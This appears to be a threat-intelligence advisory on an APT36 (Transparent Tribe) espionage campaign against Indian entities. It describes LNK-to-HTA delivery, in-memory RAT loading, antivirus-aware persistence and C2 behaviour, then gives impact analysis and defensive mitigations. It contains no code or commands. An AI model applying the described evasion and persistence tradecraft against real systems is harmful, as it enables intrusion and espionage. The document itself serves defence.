Transparent Tribe, also known as APT36, is a state-sponsored threat actor active since at least 2013, primarily targeting Indian governmental, academic, and strategic entities. The recent campaign employs spear-phishing emails containing ZIP archives with weaponized Windows shortcut (LNK) files masquerading as legitimate PDF documents. When opened, these LNK files trigger execution of remote HTML Application (HTA) scripts via mshta.exe, which decrypt and load the RAT payload directly into memory, while simultaneously opening a decoy PDF to avoid user suspicion. The malware demonstrates environment profiling by detecting installed antivirus solutions and adapting its persistence mechanisms accordingly: creating obfuscated HTA payloads and LNK files in startup folders for Kaspersky, batch scripts for Quick Heal, direct payload copying for Avast, AVG, or Avira, and fallback registry and batch file persistence if no recognized AV is found. The RAT DLL (iinneldc.dll) supports remote system control, file operations, data exfiltration, screenshot capture, clipboard manipulation, and process control. A secondary campaign uses a malicious shortcut file to deliver a .NET-based loader that drops DLLs and executables, establishing persistence via registry modifications and startup scripts. The malware communicates with a command-and-control (C2) server through obfuscated HTTP GET requests, supporting registration, heartbeat, command execution, and anti-VM checks. Although the C2 infrastructure is currently inactive, the persistence mechanisms ensure potential future reactivation. This campaign reflects a highly persistent, strategically motivated cyber espionage operation focused on intelligence gathering from Indian entities. The threat actor’s evolving toolset and adaptive persistence techniques complicate detection and mitigation efforts. Additionally, the report references related activity by the Patchwork group targeting Pakistan, indicating regional cyber espionage tensions.

For European organizations, the direct impact is currently limited given the primary targeting of Indian government and academia. However, the sophisticated nature of the RAT and its adaptive persistence techniques pose a risk if the malware or its variants spread beyond India, especially to European entities with ties to Indian governmental or academic institutions, or those involved in strategic partnerships. The malware’s capabilities for remote control, data exfiltration, and system manipulation could lead to significant confidentiality breaches, intellectual property theft, and operational disruption. The use of deceptive delivery methods and environment-aware persistence increases the likelihood of successful infection and prolonged undetected presence. European organizations involved in international research collaborations, diplomatic missions, or with Indian diaspora connections should be vigilant. The threat also underscores the evolving tactics of state-sponsored groups in the region, which could inform broader geopolitical cyber risks affecting Europe indirectly through supply chain or third-party compromises.

European organizations should implement targeted email security controls to detect and block spear-phishing attempts, especially those containing LNK files or ZIP archives masquerading as PDFs. Deploy advanced endpoint detection and response (EDR) solutions capable of monitoring mshta.exe executions and detecting in-memory payload loading. Regularly audit startup folders, registry run keys, and scheduled tasks for unauthorized persistence mechanisms, particularly those involving HTA, batch scripts, or suspicious LNK files. Employ antivirus and anti-malware solutions with heuristic and behavioral detection to identify obfuscated payloads and environment-aware malware. Conduct user awareness training emphasizing the risks of opening unexpected attachments, especially LNK files disguised as documents. Network monitoring should include detection of anomalous HTTP GET requests with obfuscated endpoints and beaconing behavior indicative of C2 communication. Implement strict application whitelisting and restrict execution of scripts and HTA files where possible. Maintain up-to-date threat intelligence feeds to identify emerging indicators related to Transparent Tribe and related APT groups. For organizations with Indian ties, consider enhanced monitoring and incident response readiness for espionage-related activities. Finally, segment networks to limit lateral movement and data exfiltration capabilities if compromise occurs.